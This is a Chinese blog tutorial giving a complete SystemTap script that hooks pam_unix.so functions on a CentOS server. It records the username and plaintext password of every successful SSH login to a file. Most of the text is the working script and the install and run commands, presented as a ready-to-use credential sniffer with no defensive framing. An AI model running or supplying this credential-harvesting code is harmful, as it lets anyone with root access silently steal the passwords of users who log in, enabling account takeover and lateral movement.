使用systemtap抓取ssh登录的用户名和密码

systemtap是一款非常强大内核调试工具,可以debug很多关于kernel层的问题。Linux是通过PAM模块检测用户信息和认证信息的,从而确定一个用户是否可以登录系统,利用这个知识点,使用systemtap捕获一下pam_unix.so该动态库文件的函数调用,获得用户在ssh远程登录时的用户名和密码吧。

测试环境:CentOS6.4 32bit

内核版本:2.6.32-358.el6.i686

首先安装以下rpm包
yum --releasever=6.4 update

yum install -y systemtap

debuginfo-install $(rpm -qf /lib/security/pam_unix.so)

创建文件,写入以下代码
touch /root/capture_pass.stp

点击(此处)折叠或打开

  1. #!/usr/bin/stap
  2. global username, pass, isSuccRet = 1;
  3. probe process("/lib/security/pam_unix.so").function("_unix_verify_password")
  4. {
  5. username = user_string($name);
  6. pass = user_string($p);
  7. }
  8. probe process("/lib/security/pam_unix.so").function("_unix_verify_password").return
  9. {
  10. if ($return == 0)
  11. {
  12. printf("User: %snPassword: %snn", username, pass);
  13. isSuccRet = 0;
  14. }
  15. }
  16. probe process("/lib/security/pam_unix.so").function("pam_sm_open_session")
  17. {
  18. if (isSuccRet != 0)
  19. {
  20. printf("Login via ssh service.nUser: %snPassword: %snn", username, pass);
  21. }
  22. isSuccRet = 1;
  23. }

赋予可执行权限
chmod +x capture_pass.stp
创建一个记录密码的文件
touch password.txt
执行systemstap脚本
stap capture_pass.stp -o password.txt

 

本地执行capture_pass.stp脚本,同时ssh远程登录系统,即使第一次登录失败也没有问题,不会记录尝试输入的错误密码。登录成功后ctl+C终止脚本运行,查看password.txt,成功捕获。systemstap很强大的利器,所以只有超户可以使用。

标签: 无
返回文章列表 文章二维码
本页链接的二维码
打赏二维码